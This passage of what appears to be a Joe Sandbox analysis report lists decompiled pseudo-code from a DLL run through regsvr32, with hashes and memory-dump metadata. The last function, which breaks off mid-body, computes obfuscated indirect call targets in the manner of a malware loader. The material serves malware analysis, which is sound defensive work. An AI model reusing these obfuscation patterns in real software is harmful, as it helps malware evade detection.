                                                                                                                						_push( *( *(__esi + 0x50)));
                                                                                                                						__ecx = __eax;
                                                                                                                						__eax =  *(__esi + 0x54);
                                                                                                                						__ecx =  *(__esi + 0x50);
                                                                                                                						 *(__ecx + 8) =  *(__esi + 0x54);
                                                                                                                						__eax =  *(__esi + 0x54);
                                                                                                                						__eax =  *( *(__esi + 0x54) + 0xc);
                                                                                                                						__eflags = __eax - 0x3333333;
                                                                                                                						 *(__esi + 0x10) = __eax;
                                                                                                                						if(__eax <= 0x3333333) {
                                                                                                                							__eax = __eax * 0x28;
                                                                                                                							__imp__CoTaskMemAlloc(__eax);
                                                                                                                							__ecx = 0;
                                                                                                                							__eflags = __eax - __edi;
                                                                                                                							__ecx = 0 | __eflags != 0x00000000;
                                                                                                                							 *(__esi + 0x14) = __eax;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								 *(__esi + 0x10) =  *(__esi + 0x10) * 0x28;
                                                                                                                								__eax = E1003BB70(__edi, __eax, __edi,  *(__esi + 0x10) * 0x28);
                                                                                                                								__ecx =  *(__esi + 0x50);
                                                                                                                								__eax = E100325A8( *(__esi + 0x50));
                                                                                                                								__ecx =  *(__esi + 0x50);
                                                                                                                								__eax = E1002F9AF(__ecx);
                                                                                                                								L32:
                                                                                                                								__eflags =  *(_t222 + 0x10);
                                                                                                                								_a16 = 0;
                                                                                                                								if( *(_t222 + 0x10) > 0) {
                                                                                                                									_t187 = 0;
                                                                                                                									__eflags = 0;
                                                                                                                									do {
                                                                                                                										_t163 = E100160BC(__eflags, 0x1c);
                                                                                                                										_a8 = _t163;
                                                                                                                										__eflags = _t163;
                                                                                                                										_v4 = 0;
                                                                                                                										if(_t163 == 0) {
                                                                                                                											_t164 = 0;
                                                                                                                											__eflags = 0;
                                                                                                                										} else {
                                                                                                                											_t164 = E1002E1A8(_t163, 0xa);
                                                                                                                										}
                                                                                                                										_v4 = _v4 | 0xffffffff;
                                                                                                                										_a16 = _a16 + 1;
                                                                                                                										 *((intOrPtr*)(_t187 +  *((intOrPtr*)(_t222 + 0x14)) + 0x24)) = _t164;
                                                                                                                										_t187 = _t187 + 0x28;
                                                                                                                										__eflags = _a16 -  *(_t222 + 0x10);
                                                                                                                									} while (__eflags < 0);
                                                                                                                								}
                                                                                                                								_t185 = _v16;
                                                                                                                								__eflags = _t185;
                                                                                                                								if(_t185 != 0) {
                                                                                                                									__eflags = _a4;
                                                                                                                									if(_a4 > 0) {
                                                                                                                										_t154 = 0xffffffdc;
                                                                                                                										_t186 = _t185 + 0x24;
                                                                                                                										_a16 = _a4;
                                                                                                                										_a8 = _t154 - _v16;
                                                                                                                										while(1) {
                                                                                                                											_t202 =  *( *_t186 + 4);
                                                                                                                											__eflags = _t202;
                                                                                                                											_a4 = _t202;
                                                                                                                											if(_t202 == 0) {
                                                                                                                												goto L46;
                                                                                                                											}
                                                                                                                											while(1) {
                                                                                                                												_t158 = E100182A6( &_a4);
                                                                                                                												_t215 =  *_t222;
                                                                                                                												 *((intOrPtr*)( *_t222 + 8))( *_t158, 1);
                                                                                                                												__eflags = _a4;
                                                                                                                												if(_a4 == 0) {
                                                                                                                													goto L46;
                                                                                                                												}
                                                                                                                											}
                                                                                                                											L46:
                                                                                                                											E1002E0D0( *_t186);
                                                                                                                											_t204 =  *_t186;
                                                                                                                											__eflags = _t204;
                                                                                                                											if(_t204 != 0) {
                                                                                                                												 *((intOrPtr*)( *_t204 + 4))(1);
                                                                                                                											}
                                                                                                                											_t186 =  &(_t186[0xa]);
                                                                                                                											_t127 =  &_a16;
                                                                                                                											 *_t127 = _a16 - 1;
                                                                                                                											__eflags =  *_t127;
                                                                                                                											if( *_t127 != 0) {
                                                                                                                												continue;
                                                                                                                											}
                                                                                                                											goto L49;
                                                                                                                										}
                                                                                                                									}
                                                                                                                									L49:
                                                                                                                									__imp__CoTaskMemFree(_v16);
                                                                                                                								}
                                                                                                                								L50:
                                                                                                                								_t139 =  *_t225;
                                                                                                                								goto L51;
                                                                                                                							} else {
                                                                                                                								_push(_t225);
                                                                                                                								_t228 = _t232;
                                                                                                                								_push(_t188);
                                                                                                                								_v168 = 0x1006c808;
                                                                                                                								E1003D2F0( &_v168, 0x10065188);
                                                                                                                								asm("int3");
                                                                                                                								_push(_t228);
                                                                                                                								_t229 = _t232;
                                                                                                                								_push(_t188);
                                                                                                                								_v176 = 0x1006c8a0;
                                                                                                                								E1003D2F0( &_v176, 0x100651e8);
                                                                                                                								asm("int3");
                                                                                                                								_push(_t229);
                                                                                                                								_push(_t188);
                                                                                                                								_v184 = 0x1006c938;
                                                                                                                								E1003D2F0( &_v184, 0x1006522c);
                                                                                                                								asm("int3");
                                                                                                                								_push(4);
                                                                                                                								E1003D1E6(E10052A8D, _t181, 0, _t222);
                                                                                                                								_t214 = E1002D12C(0x104);
                                                                                                                								_v196 = _t214;
                                                                                                                								_t179 = 0;
                                                                                                                								_v184 = 0;
                                                                                                                								if(_t214 != 0) {
                                                                                                                									_t179 = E10022AE3(_t214);
                                                                                                                								}
                                                                                                                								return E1003D2BE(_t179);
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							__eax = 0x8007000e;
                                                                                                                							goto L51;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}



















































                                                                                                                0x100172b2
                                                                                                                0x100172b7
                                                                                                                0x100172b8
                                                                                                                0x100172bf
                                                                                                                0x100172ce
                                                                                                                0x100172d0
                                                                                                                0x100172d3
                                                                                                                0x100172d7
                                                                                                                0x100172da
                                                                                                                0x100172dc
                                                                                                                0x100172dc
                                                                                                                0x100172e6
                                                                                                                0x100172e6
                                                                                                                0x10032e5c
                                                                                                                0x10032e5c
                                                                                                                0x00000000
                                                                                                                0x10032e5c
                                                                                                                0x10032e5a
                                                                                                                0x10032d81

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2459298410-0
                                                                                                                • Opcode ID: 2a1cda0c8fde6cf51b23e7454adfbcb69be02890f485d02d45f8984b0f8094f7
                                                                                                                • Instruction ID: 67e2416ab46e05a41e9fb53225900a888a4efb9c4cb038c1b3bceab70bac0ac4
                                                                                                                • Opcode Fuzzy Hash: 2a1cda0c8fde6cf51b23e7454adfbcb69be02890f485d02d45f8984b0f8094f7
                                                                                                                • Instruction Fuzzy Hash: FDC1F574600609EFCB15CF68C895AAAB7F5FF88305F10892AF856CB391DB71E945CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 70%
                                                                                                                			E10033BDF(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr* _t83;
                                                                                                                				intOrPtr* _t84;
                                                                                                                				intOrPtr _t85;
                                                                                                                				intOrPtr* _t86;
                                                                                                                				intOrPtr _t101;
                                                                                                                				intOrPtr* _t121;
                                                                                                                				intOrPtr* _t122;
                                                                                                                				intOrPtr* _t124;
                                                                                                                				intOrPtr* _t126;
                                                                                                                				intOrPtr* _t128;
                                                                                                                				intOrPtr* _t130;
                                                                                                                				intOrPtr* _t145;
                                                                                                                				intOrPtr* _t151;
                                                                                                                				intOrPtr* _t160;
                                                                                                                				intOrPtr _t161;
                                                                                                                				intOrPtr _t162;
                                                                                                                				void* _t163;
                                                                                                                				void* _t164;
                                                                                                                				intOrPtr _t166;
                                                                                                                				intOrPtr* _t167;
                                                                                                                				void* _t168;
                                                                                                                				intOrPtr _t180;
                                                                                                                
                                                                                                                				_push(0x10);
                                                                                                                				E1003D1E6(E100549D9, __ebx, __edi, __esi);
                                                                                                                				_t166 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t168 - 0x1c)) = __ecx;
                                                                                                                				 *((intOrPtr*)(__ecx)) = 0x1005cf5c;
                                                                                                                				 *(_t168 - 4) = 0;
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
                                                                                                                					L11:
                                                                                                                					while( *((intOrPtr*)(_t166 + 0x24)) != 0) {
                                                                                                                						_t160 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x1c)) + 8));
                                                                                                                						__eflags = _t160;
                                                                                                                						if(_t160 == 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_t151 =  *_t160;
                                                                                                                						__eflags = _t151;
                                                                                                                						if(_t151 == 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						 *((intOrPtr*)( *_t151 + 0xbc))( *((intOrPtr*)(_t160 + 8)), 0);
                                                                                                                						 *((intOrPtr*)( *_t160 + 0x98)) = 0;
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)(_t168 - 0x18)) = _t166 + 0x18;
                                                                                                                					E1002E0D0(_t166 + 0x18);
                                                                                                                					if( *((intOrPtr*)(_t166 + 0x40)) == 0) {
                                                                                                                						L19:
                                                                                                                						_t83 =  *((intOrPtr*)(_t166 + 8));
                                                                                                                						if(_t83 != 0) {
                                                                                                                							 *((intOrPtr*)( *_t83 + 8))(_t83);
                                                                                                                						}
                                                                                                                						_t84 =  *((intOrPtr*)(_t166 + 0xc));
                                                                                                                						if(_t84 != 0) {
                                                                                                                							 *((intOrPtr*)( *_t84 + 8))(_t84);
                                                                                                                						}
                                                                                                                						if( *((intOrPtr*)(_t166 + 0x14)) == 0) {
                                                                                                                							L32:
                                                                                                                							_t85 =  *((intOrPtr*)(_t166 + 0x34));
                                                                                                                							if(_t85 != 0) {
                                                                                                                								__imp__CoTaskMemFree(_t85);
                                                                                                                							}
                                                                                                                							_t136 =  *((intOrPtr*)(_t166 + 0x54));
                                                                                                                							if( *((intOrPtr*)(_t166 + 0x54)) != 0) {
                                                                                                                								E100325F3(_t136,  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x50)))));
                                                                                                                								E1002E719( *((intOrPtr*)(_t166 + 0x54)));
                                                                                                                							}
                                                                                                                							_t161 =  *((intOrPtr*)(_t166 + 0x54));
                                                                                                                							_t192 = _t161;
                                                                                                                							if(_t161 != 0) {
                                                                                                                								E1002E719(_t161);
                                                                                                                								_push(_t161);
                                                                                                                								E100160E7(0, _t161, _t166, _t192);
                                                                                                                							}
                                                                                                                							_t162 =  *((intOrPtr*)(_t166 + 0x50));
                                                                                                                							_t193 = _t162;
                                                                                                                							if(_t162 != 0) {
                                                                                                                								E100339BE(_t162, _t193);
                                                                                                                								_push(_t162);
                                                                                                                								E100160E7(0, _t162, _t166, _t193);
                                                                                                                							}
                                                                                                                							_t86 =  *((intOrPtr*)(_t166 + 0x4c));
                                                                                                                							if(_t86 != 0) {
                                                                                                                								 *((intOrPtr*)( *_t86 + 8))(_t86);
                                                                                                                							}
                                                                                                                							_t167 =  *((intOrPtr*)(_t166 + 0x48));
                                                                                                                							if(_t167 != 0) {
                                                                                                                								 *((intOrPtr*)( *_t167 + 8))(_t167);
                                                                                                                							}
                                                                                                                							 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
                                                                                                                							return E1003D2BE(E1002E1CB( *((intOrPtr*)(_t168 - 0x18))));
                                                                                                                						} else {
                                                                                                                							 *((intOrPtr*)(_t168 - 0x10)) = 0;
                                                                                                                							if( *((intOrPtr*)(_t166 + 0x10)) <= 0) {
                                                                                                                								L31:
                                                                                                                								__imp__CoTaskMemFree( *((intOrPtr*)(_t166 + 0x14)));
                                                                                                                								goto L32;
                                                                                                                							}
                                                                                                                							_t163 = 0;
                                                                                                                							do {
                                                                                                                								_t101 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24)) + 4));
                                                                                                                								 *((intOrPtr*)(_t168 - 0x14)) = _t101;
                                                                                                                								if(_t101 == 0) {
                                                                                                                									goto L28;
                                                                                                                								} else {
                                                                                                                									goto L27;
                                                                                                                								}
                                                                                                                								do {
                                                                                                                									L27:
                                                                                                                									 *((intOrPtr*)( *((intOrPtr*)(E100182A6(_t168 - 0x14))) + 0x98)) = 0;
                                                                                                                								} while ( *((intOrPtr*)(_t168 - 0x14)) != 0);
                                                                                                                								L28:
                                                                                                                								E1002E0D0( *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24)));
                                                                                                                								_t145 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24));
                                                                                                                								if(_t145 != 0) {
                                                                                                                									 *((intOrPtr*)( *_t145 + 4))(1);
                                                                                                                								}
                                                                                                                								 *((intOrPtr*)(_t168 - 0x10)) =  *((intOrPtr*)(_t168 - 0x10)) + 1;
                                                                                                                								_t163 = _t163 + 0x28;
                                                                                                                							} while ( *((intOrPtr*)(_t168 - 0x10)) <  *((intOrPtr*)(_t166 + 0x10)));
                                                                                                                							goto L31;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t164 = 0;
                                                                                                                					if( *((intOrPtr*)(_t166 + 0x38)) <= 0) {
                                                                                                                						L17:
                                                                                                                						if(_t180 != 0) {
                                                                                                                							_push( *((intOrPtr*)(_t166 + 0x3c)));
                                                                                                                							E100160E7(0, _t164, _t166, _t180);
                                                                                                                							_push( *((intOrPtr*)(_t166 + 0x40)));
                                                                                                                							E100160E7(0, _t164, _t166, _t180);
                                                                                                                						}
                                                                                                                						goto L19;
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)(_t168 - 0x10)) = 0;
                                                                                                                					do {
                                                                                                                						__imp__#9( *((intOrPtr*)(_t166 + 0x40)) +  *((intOrPtr*)(_t168 - 0x10)));
                                                                                                                						 *((intOrPtr*)(_t168 - 0x10)) =  *((intOrPtr*)(_t168 - 0x10)) + 0x10;
                                                                                                                						_t164 = _t164 + 1;
                                                                                                                					} while (_t164 <  *((intOrPtr*)(_t166 + 0x38)));
                                                                                                                					_t180 =  *((intOrPtr*)(_t166 + 0x38));
                                                                                                                					goto L17;
                                                                                                                				}
                                                                                                                				_t121 =  *((intOrPtr*)(__ecx + 0x50));
                                                                                                                				if(_t121 == 0) {
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				_t122 =  *_t121;
                                                                                                                				_push(_t168 - 0x14);
                                                                                                                				_push(0x1005fbb4);
                                                                                                                				_push(_t122);
                                                                                                                				if( *((intOrPtr*)( *_t122))() < 0) {
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				_t124 =  *((intOrPtr*)(_t168 - 0x14));
                                                                                                                				if(_t124 == 0) {
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				_push(_t168 - 0x10);
                                                                                                                				_push(0x1005fcf4);
                                                                                                                				 *((intOrPtr*)(_t168 - 0x10)) = 0;
                                                                                                                				_push(_t124);
                                                                                                                				if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
                                                                                                                					_t128 =  *((intOrPtr*)(_t168 - 0x10));
                                                                                                                					if(_t128 != 0) {
                                                                                                                						 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
                                                                                                                						_t130 =  *((intOrPtr*)(_t168 - 0x10));
                                                                                                                						 *((intOrPtr*)( *_t130 + 8))(_t130);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t126 =  *((intOrPtr*)(_t168 - 0x14));
                                                                                                                				 *((intOrPtr*)( *_t126 + 8))(_t126);
                                                                                                                				goto L11;
                                                                                                                			}


























                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                • String ID:
                                                                                                                • API String ID: 365290523-0
                                                                                                                • Opcode ID: a8de48418c05986b90abf77f83f785ce64b132ccee4a4e05c67e5061009a2a10
                                                                                                                • Instruction ID: e5f4853a01d02bc63f6b5fc7fbb96a165286f04c4fb03596484d01933deb3a79
                                                                                                                • Opcode Fuzzy Hash: a8de48418c05986b90abf77f83f785ce64b132ccee4a4e05c67e5061009a2a10
                                                                                                                • Instruction Fuzzy Hash: 18710175A006429FCB61CFA4D9C486AB7F2FF48306B61886DE546AB721CB31FD85CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 34%
                                                                                                                			E10033809(signed int __ecx, void* __edx) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				void* _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				struct tagRECT _v40;
                                                                                                                				struct tagRECT _v56;
                                                                                                                				char _v76;
                                                                                                                				intOrPtr _v88;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				intOrPtr _t63;
                                                                                                                				signed int _t64;
                                                                                                                				intOrPtr _t70;
                                                                                                                				signed int _t72;
                                                                                                                				signed int _t73;
                                                                                                                				signed int _t75;
                                                                                                                				intOrPtr* _t77;
                                                                                                                				signed int _t78;
                                                                                                                				intOrPtr* _t80;
                                                                                                                				signed int _t81;
                                                                                                                				intOrPtr* _t82;
                                                                                                                				intOrPtr* _t84;
                                                                                                                				signed int _t86;
                                                                                                                				signed int _t88;
                                                                                                                				signed int _t92;
                                                                                                                				intOrPtr* _t99;
                                                                                                                				signed int _t100;
                                                                                                                				signed int _t126;
                                                                                                                				intOrPtr _t127;
                                                                                                                				void* _t144;
                                                                                                                				void* _t147;
                                                                                                                				intOrPtr* _t148;
                                                                                                                				signed int** _t150;
                                                                                                                				signed int* _t151;
                                                                                                                				signed int _t154;
                                                                                                                				signed int _t156;
                                                                                                                				void* _t158;
                                                                                                                				void* _t161;
                                                                                                                
                                                                                                                				_t144 = __edx;
                                                                                                                				_t126 = __ecx;
                                                                                                                				_t158 = _t161;
                                                                                                                				_t154 = __ecx;
                                                                                                                				_t63 =  *((intOrPtr*)(__ecx + 4));
                                                                                                                				_push(_t147);
                                                                                                                				if(_t63 != 0) {
                                                                                                                					_t64 =  *(_t63 + 0x28);
                                                                                                                					__eflags = _t64;
                                                                                                                					if(_t64 == 0) {
                                                                                                                						goto L4;
                                                                                                                					} else {
                                                                                                                						_t126 = _t64;
                                                                                                                						_t72 = E1001B075(0, _t126, _t147);
                                                                                                                						__eflags = _t72;
                                                                                                                						_v8 = _t72;
                                                                                                                						if(_t72 == 0) {
                                                                                                                							goto L4;
                                                                                                                						} else {
                                                                                                                							_t73 = IsWindowVisible( *(_t72 + 0x20));
                                                                                                                							asm("sbb eax, eax");
                                                                                                                							_t75 =  ~_t73 + 1;
                                                                                                                							__eflags = _t75;
                                                                                                                							_v24 = _t75;
                                                                                                                							if(_t75 != 0) {
                                                                                                                								GetWindowRect( *(E10019C16(0, _t126, _t158, GetDesktopWindow()) + 0x20),  &_v56);
                                                                                                                								GetWindowRect( *(_v8 + 0x20),  &_v40);
                                                                                                                								asm("cdq");
                                                                                                                								asm("cdq");
                                                                                                                								__eflags = _v56.right - _v56.left - _t144;
                                                                                                                								E1001D320(_v8, _v56.right - _v56.left - _t144 >> 1, _v56.bottom - _v56.top - _t144 >> 1, 0, 0, 0);
                                                                                                                								E1001D35E(_v8, 1);
                                                                                                                							}
                                                                                                                							_t77 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
                                                                                                                							_t148 = _t154 + 0x48;
                                                                                                                							_t78 =  *((intOrPtr*)( *_t77))(_t77, 0x1005cef0, _t148);
                                                                                                                							__eflags = _t78;
                                                                                                                							if(_t78 < 0) {
                                                                                                                								_t80 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
                                                                                                                								_t81 =  *((intOrPtr*)( *_t80))(_t80, 0x1005cf48,  &_v16);
                                                                                                                								__eflags = _t81;
                                                                                                                								if(_t81 >= 0) {
                                                                                                                									_t82 = _v16;
                                                                                                                									 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v20);
                                                                                                                									_t84 = _v16;
                                                                                                                									 *((intOrPtr*)( *_t84 + 8))(_t84);
                                                                                                                									_t86 = _v20;
                                                                                                                									__eflags = _t86;
                                                                                                                									if(_t86 != 0) {
                                                                                                                										_t150 = _t154 + 8;
                                                                                                                										_v12 =  *((intOrPtr*)( *_t86))(_t86, 0x1005f9e4, _t150);
                                                                                                                										_t88 = _v20;
                                                                                                                										 *((intOrPtr*)( *_t88 + 8))(_t88);
                                                                                                                										_t81 = _v12;
                                                                                                                										__eflags = _t81;
                                                                                                                										if(__eflags >= 0) {
                                                                                                                											_t151 =  *_t150;
                                                                                                                											 *( *_t151)(_t151, 0x1005f9d4, _t154 + 0xc);
                                                                                                                											goto L21;
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										_t81 = 0x80004005;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_t99 =  *_t148;
                                                                                                                								_t151 = _t154 + 0x4c;
                                                                                                                								_t100 =  *((intOrPtr*)( *_t99 + 0xc))(_t99, 0, 0x1005fc44, _t151);
                                                                                                                								__eflags =  *_t151;
                                                                                                                								_v12 = _t100;
                                                                                                                								if( *_t151 == 0) {
                                                                                                                									_v12 = 0x80004003;
                                                                                                                								}
                                                                                                                								__eflags = _v12;
                                                                                                                								if(__eflags >= 0) {
                                                                                                                									L21:
                                                                                                                									_t92 = E10032D33(0, _t154, _t151, _t154, __eflags);
                                                                                                                									__eflags = _v24;
                                                                                                                									_t156 = _t92;
                                                                                                                									if(_v24 != 0) {
                                                                                                                										__eflags = _v40.right - _v40.left;
                                                                                                                										E1001D320(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
                                                                                                                										E1001D35E(_v8, 0);
                                                                                                                									}
                                                                                                                									_t81 = _t156;
                                                                                                                								} else {
                                                                                                                									__eflags = _v24;
                                                                                                                									if(_v24 != 0) {
                                                                                                                										__eflags = _v40.right - _v40.left;
                                                                                                                										E1001D320(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
                                                                                                                										E1001D35E(_v8, 0);
                                                                                                                									}
                                                                                                                									_t81 = _v12;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							return _t81;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L4:
                                                                                                                					_push(_t158);
                                                                                                                					_push(_t126);
                                                                                                                					_v76 = 0x1006c938;
                                                                                                                					E1003D2F0( &_v76, 0x1006522c);
                                                                                                                					asm("int3");
                                                                                                                					_push(4);
                                                                                                                					E1003D1E6(E10052A8D, 0, _t147, _t154);
                                                                                                                					_t127 = E1002D12C(0x104);
                                                                                                                					_v88 = _t127;
                                                                                                                					_t70 = 0;
                                                                                                                					_v76 = 0;
                                                                                                                					if(_t127 != 0) {
                                                                                                                						_t70 = E10022AE3(_t127);
                                                                                                                					}
                                                                                                                					return E1003D2BE(_t70);
                                                                                                                				}
                                                                                                                			}













































                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$DesktopVisible
                                                                                                                • String ID:
                                                                                                                • API String ID: 1055025324-0
                                                                                                                • Opcode ID: 110d3bac6837f59858366cce0ca108784b8b0ec5d92e0cf275b344010d483ca8
                                                                                                                • Instruction ID: 33e33c5df8d75f6d5011043d3de45f5d230c7e66059f1d27cc87883ac04d00d4
                                                                                                                • Opcode Fuzzy Hash: 110d3bac6837f59858366cce0ca108784b8b0ec5d92e0cf275b344010d483ca8
                                                                                                                • Instruction Fuzzy Hash: 5B51E675A0010AEFCB01DFA8D9C4DAEB7B9FF48205B214459F655EB251CB31EE44CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 28%
                                                                                                                			E100088F0(void* _a4) {
                                                                                                                				void* _t44;
                                                                                                                				signed int _t45;
                                                                                                                				signed int _t51;
                                                                                                                				signed int _t60;
                                                                                                                				signed int _t62;
                                                                                                                				signed int _t74;
                                                                                                                				signed int _t83;
                                                                                                                				void* _t93;
                                                                                                                				signed int _t101;
                                                                                                                				intOrPtr _t104;
                                                                                                                				signed int _t106;
                                                                                                                				intOrPtr _t112;
                                                                                                                				signed int _t117;
                                                                                                                				signed int _t126;
                                                                                                                				signed int _t130;
                                                                                                                				signed int _t134;
                                                                                                                				signed int _t135;
                                                                                                                				void* _t137;
                                                                                                                				signed int _t144;
                                                                                                                				void* _t159;
                                                                                                                				void* _t160;
                                                                                                                
                                                                                                                				_t137 = _a4;
                                                                                                                				if(_t137 != 0) {
                                                                                                                					if( *((intOrPtr*)(_t137 + 0x10)) != 0) {
                                                                                                                						_t134 =  *0x1006c2cc; // 0x0
                                                                                                                						_t83 =  *0x1006c2bc; // 0x0
                                                                                                                						_t126 =  *0x1006c2d0; // 0x0
                                                                                                                						_t7 = _t137 + 4; // 0xc0335d5e
                                                                                                                						_t112 =  *_t7;
                                                                                                                						_t9 = _t126 * 2; // 0x6
                                                                                                                						_t135 =  *0x1006c2c0; // 0x0
                                                                                                                						 *((intOrPtr*)(((_t83 + _t134 + (_t83 + _t134) * 2 - 3) *  *0x1006c2c8 + _t126 + _t9 + 6) * _t134 + _t83 - _t135 + _t135 -  *0x1006c2c4 + _t126 + _t83 - _t135 + _t135 -  *0x1006c2c4 + _t126 -  *0x1006c2c8 + (_t83 - _t135 + _t135 -  *0x1006c2c4 + _t126 + _t83 - _t135 + _t135 -  *0x1006c2c4 + _t126 -  *0x1006c2c8) * 2 +  *((intOrPtr*)( *_t137 + 0x28)) + _t112))(_t112, 0, 0);
                                                                                                                					}
                                                                                                                					_t101 =  *0x1006c2d0; // 0x0
                                                                                                                					_t45 =  *0x1006c2c8; // 0x0
                                                                                                                					_t16 = _t137 + 0x30; // 0x8b14244c
                                                                                                                					 *0x1006eff8((_t45 - _t101 *  *0x1006c2cc *  *0x1006c2c0 + (_t45 - _t101 *  *0x1006c2cc *  *0x1006c2c0) * 2 << 4) +  *_t16);
                                                                                                                					_t160 = _t159 + 4;
                                                                                                                					if( *((intOrPtr*)(_t137 + 8)) == 0) {
                                                                                                                						L10:
                                                                                                                						_t37 = _t137 + 4; // 0xc0335d5e
                                                                                                                						_t104 =  *_t37;
                                                                                                                						if(_t104 != 0) {
                                                                                                                							_t38 = _t137 + 0x34; // 0x400d89c7
                                                                                                                							_t51 =  *0x1006c2c4; // 0x0
                                                                                                                							_t43 = _t137 + 0x20; // 0xc8a12874
                                                                                                                							 *((intOrPtr*)( *_t43))(_t104, 0, _t51 + _t51 * 2 + _t51 + _t51 * 2 + 0x8000,  *_t38);
                                                                                                                						}
                                                                                                                						return HeapFree(GetProcessHeap(), 0, _t137);
                                                                                                                					} else {
                                                                                                                						_t130 =  *0x1006c2c4; // 0x0
                                                                                                                						_t106 =  *0x1006c2c0; // 0x0
                                                                                                                						_t117 =  *0x1006c2cc; // 0x0
                                                                                                                						_t60 =  *0x1006c2d0; // 0x0
                                                                                                                						_t20 = _t137 + 0xc; // 0x8b078bc3
                                                                                                                						_t93 = 0;
                                                                                                                						if(_t117 - (_t130 * _t130 *  *0x1006c2c8 * _t106 + _t106 + 2) * _t106 - _t60 +  *_t20 <= 0) {
                                                                                                                							L9:
                                                                                                                							_t133 = (_t130 + 3) * _t60 + (_t117 + 1) *  *0x1006c2bc * _t106 +  *0x1006c2c8;
                                                                                                                							_t34 = _t137 + 8; // 0x44c4835b
